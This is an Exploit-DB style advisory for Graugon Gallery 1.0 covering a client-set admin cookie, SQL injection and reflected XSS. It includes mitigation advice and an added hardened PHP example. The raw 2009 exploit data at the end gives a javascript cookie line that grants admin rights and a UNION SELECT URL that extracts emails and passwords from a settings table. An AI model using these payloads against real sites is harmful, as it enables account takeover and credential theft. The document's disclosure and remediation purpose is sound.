Vendor: Graugon Gallery
By: x0r
CVSS: 8.8 (HIGH)
Vulnerability: Sql Injection/ Insecure Cookie Handling/XSS
CWE: 89, 79, 79, 79
Product Name: Graugon Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:graugon:graugon_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Graugon Gallery 1.0

The insecure cookie handling vulnerability is in /[path]/admin.php, which marks a visitor as administrator with a client-controlled cookie. The SQL injection and XSS vulnerabilities are both in /[path]/view.php, which passes the unvalidated `id` parameter straight into a database query and reflects it unescaped into the page.

Mitigation:

Ensure that user input is properly validated and sanitized. Use prepared statements with bound parameters to prevent SQL injection, and HTML-escape values before reflecting them into the page to prevent XSS. Use a secure cookie handling mechanism: keep authentication state server-side rather than trusting a flag the client can set.
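The following is an added example written for this page, not code from Graugon Gallery, showing hardened counterparts to the three patterns the advisory describes: server-side session state instead of a client-set admin cookie, a parameterised lookup for `id`, and output encoding for the reflected link. The table and column names (`g_gallery`, `g_settings`, `username`, `password_hash`) and the session key `is_admin` are assumptions for illustration; the demonstration at the bottom runs against an in-memory SQLite database with constructed rows.

```php
<?php
// Added example, not Graugon Gallery code. Schema names and the session
// key below are assumptions chosen for illustration.
declare(strict_types=1);

// 1. Authentication state is kept server-side. A client can set any cookie
//    it likes, so a cookie value such as g_admin=1 must never grant access.
function startSecureSession(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // only sent over HTTPS
        'httponly' => true,   // not readable from JavaScript
        'samesite' => 'Lax',
    ]);
    session_start();
}

function adminLogin(PDO $db, string $user, string $pass): bool
{
    // Assumed schema: g_settings(username, password_hash) with password_hash().
    $stmt = $db->prepare('SELECT password_hash FROM g_settings WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);      // new session id on privilege change
    $_SESSION['is_admin'] = true;     // assumed session key
    return true;
}

function requireAdmin(): void
{
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// 2. The id is validated as a plain integer and bound as a parameter, so the
//    value is data to the database, never part of the SQL text.
function fetchGallery(PDO $db, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null;                  // anything that is not digits is rejected
    }
    $stmt = $db->prepare('SELECT * FROM g_gallery WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. The id is HTML-escaped before being reflected into the link, so any
//    markup in the parameter is rendered as literal text.
function galleryLink(string $rawId): string
{
    $safe = htmlspecialchars($rawId, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<a href='view.php?id=" . $safe . "'>view</a>";
}

// Demonstration against an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE g_gallery (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO g_gallery (id, title) VALUES (1, 'Holiday')");

$ok  = fetchGallery($db, '1');                                   // one row
$bad = fetchGallery($db, '-1 union select 0,0 from g_gallery--'); // rejected, null
echo 'valid id  : ', $ok['title'] ?? 'none', "\n";
echo 'crafted id: ', $bad === null ? 'rejected' : 'accepted', "\n";
echo galleryLink("<script>alert(1)</script>"), "\n";
```

The integer check in `fetchGallery` is defence in depth: the bound `PDO::PARAM_INT` parameter already prevents injection on its own, but rejecting malformed ids early also keeps junk out of logs and error paths. Note that `requireAdmin` relies on `startSecureSession` having been called first, and that `adminLogin` assumes password hashes were created with PHP's `password_hash()`.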

Exploit-DB raw data:

#########################################################################################
[0x01] Information:

Name           : Graugon Gallery  1.0
Download       : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1
Vulnerability  : Sql Injection/ Insecure Cookie Handling/XSS
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[code]
$TwoMonths = 60 * 60 * 24 * 60 + time(); 
setcookie(g_admin, 1, $TwoMonths);   // admin status is stored in a cookie the client can set itself
[/code]

Bugged file is /[path]/view.php

[code]

$id = $_GET['id'];   // taken from the request without validation
...

$query = "SELECT * FROM g_gallery WHERE id=$id";   // interpolated directly into the SQL text
$result = mysql_query($query);
[/code]

[code]

$id = $_GET['id'];

echo "....<a href='view.php?id=" . $id . "'> "   // reflected into the page without HTML escaping

[/code]


#########################################################################################
[0x03] Exploits:

Exploit: 1- javascript:document.cookie ="g_admin=1; path=/"
         2- http://victim.it/view.php?id=-1337 union select 0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--
            ( change number of columns)
         3- ?id=[XSSCODE]

########################################################################################

# milw0rm.com [2009-02-11]